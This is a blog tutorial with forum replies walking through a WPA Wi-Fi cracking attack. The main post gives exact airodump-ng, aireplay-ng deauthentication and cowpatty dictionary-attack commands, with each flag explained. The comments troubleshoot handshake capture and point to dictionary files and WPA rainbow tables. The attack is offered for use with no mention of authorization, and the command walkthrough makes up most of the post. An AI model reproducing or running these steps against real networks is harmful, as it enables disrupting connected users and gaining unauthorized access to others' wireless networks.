Cracking WPA
Crack WPA using Cowpatty, aireplay, and airodump...
First, we need to get some information about the network. In this attack, we need a connected client.
Run the command
airodump-ng -w out -c 6 ath1
-w out -- saves the captured data in a file named out
-c 6 -- sets airodump to capture on channel 6
ath1 -- specifies what wireless interface to use
Now we need to look at the information airodump displays for what we need. We will see the network we are attacking. We need to look at the BSSID column for the AP MAC address and the ESSID column for the network name. In this example, we will see our AP MAC is 00:09:5B:E7:02:46 and our network is named Home. We will also need the MAC address of the client connected to the network. In this example, the client connected to the Home network has a MAC adress of 00:0D:88:C2:27:21.
Now we need to disconnect the connected client so it is forced to reconnect. Windows machines usually try and reconnect right away if they lose connection. When the client reconnects to the network we want to capture the 4 way handshake that is done with WPA.
To deauthenticate the client, run the command
aireplay-ng -0 0 -c 00:0D:88:C2:27:21 -a 00:09:5B:E7:02:46 -e Home ath1
-0 0 -- specifies the deauthentication attack method. You can set the number of deauthentication packets to send, 0 means it will send until you stop it.
-c -- sets the client to deauthenticate
-a -- sets the AP MAC
-e -- sets the name of the network you are deauthenticating the client from.
ath1 -- specifies the wireless interface to use
After sending several deauthentication packets out, the client should be kicked off the network. Now we need to start up airodump to capture the handshake. Run the command just like before
airodump-ng -w out -c 6 ath1
Now we wait for the notice in the top right of the screen telling us the handshake has been captured.
Once the handshake has been captured, we can stop airodump and start up cowpatty to crack the key. Run the command
cowpatty -f dict -r out-07.cap -s Home
-f dict -- sets the dictionary file to use as dict. This should be whatever dictionary file you are using. It just happens to be mine is called dict.
-r out-07.cap -- sets the capture file you made using airodump. Mine is called out-07.cap, yours may be called something else.
-s Home -- sets the network ESSID you are cracking. Mine is called Home.
Now cowpatty is going to run and try and use the dictionary file to crack the passphrase. If the passphrase is not in your dictionary, the attack will not work. When it finds the passphrase, it will tell you.
- uffda4761's blog
- Login or register to post comments
- Printer-friendly version
- 2522 reads








Re: Can't capture the handshake
I have never used the ipw220 card, so I don't know if it would work or not. Your best bet would be to set up a computer connected to the network that you can see (physically look at), run the command, and see if they are kicked off. If it doesn't kick them off, either the card will not work or the command was entered wrong.
___________________________________________________________________________________________________________
"Sometimes one pays most for the things one gets for nothing." - Albert Einstein
Since Uffda is the expert
Since Uffda is the expert I'll let him answer that, but I can say without using a confirmed working NIC you can run into hours of frustration. I had allot of problems cracking WEP and wasted allot of time with this POS card I had laying around. I ended up investing in something I new others had success with.
r00tk1ll | BeyondTheBit
Can't capture the handshake
Hello there,
After deauthenticate the client I can't capture the handshake in airodump-ng command even after hours waiting. I use ipw2200, is it the problem? Also I want to know how to determine that the deauthenticate command is succesfull or not? Should I use another wifi card instead of ipw2200. Are there any hardware/software update to resolve the problem with ipw2200?
thanks
Re: Hey where is that 30GB
There is a rainbow table for WPA cracking made by a group of people. You can find it here.
http://www.renderlab.net/projects/WPA-tables/
When I get my external USB drive, I am going to get that one. :)
Hey where is that 30GB
Hey where is that 30GB Dictionary file link??
r00tk1ll | BeyondTheBit
Re: how to get a dictionary file
Also, I have never tried to use a dictionary file that is not located in the same directory, but I'll take a guess. Usually you can just specify the entire path name when referencing the dictionary file.
Such as "-f /usr/doc/cowpatty/dict"
Re: how to get a dictionary file
The one I used was the sample one that is included with cowpatty. In BT2, it is located here: /usr/doc/cowpatty/dict. It may be located in the same place in BT3, but if it is not, type "locate cowpatty" in a terminal and look for the cowpatty docs and one called dict.
for more dictionary files, you can go to http://www.elitehackers.info/forums/downloads.php?do=cat&id=8 and download some.
Hope this helps.
Wait for uffda4761, he knows
Wait for uffda4761, he knows more about this than I do, I will get in contact with him
r00tk1ll | BeyondTheBit
how to get a dictionary file
I want to know how I can get the dictionary file as the tutorial here?
I use backtrack 3, Does it already have the dictionary file to use? And how to refer to the dictionary file if it isn't in the same directory?
thanks
Nice man, thanks for adding
Nice man, thanks for adding the tutorial it makes it a lot easier to follow. We need to work on some of our ettercap tricks next.
r00tk1ll | BeyondTheBit
I use a netgear PCMCIA.
I use a netgear PCMCIA. Model: WG511T.
"Punchin fake bosses in the ribs til them shits pokin out like Kate Moss's"
Not yet, I just used the
Not yet, I just used the base dictionary file that comes with Cowpatty, in the cowpatty directory for this.
"Punchin fake bosses in the ribs til them shits pokin out like Kate Moss's"
What wireless NIC?
What wireless NIC are you using??
Awesome
WPA has always been a challenge for me, are you using any rainbow tables?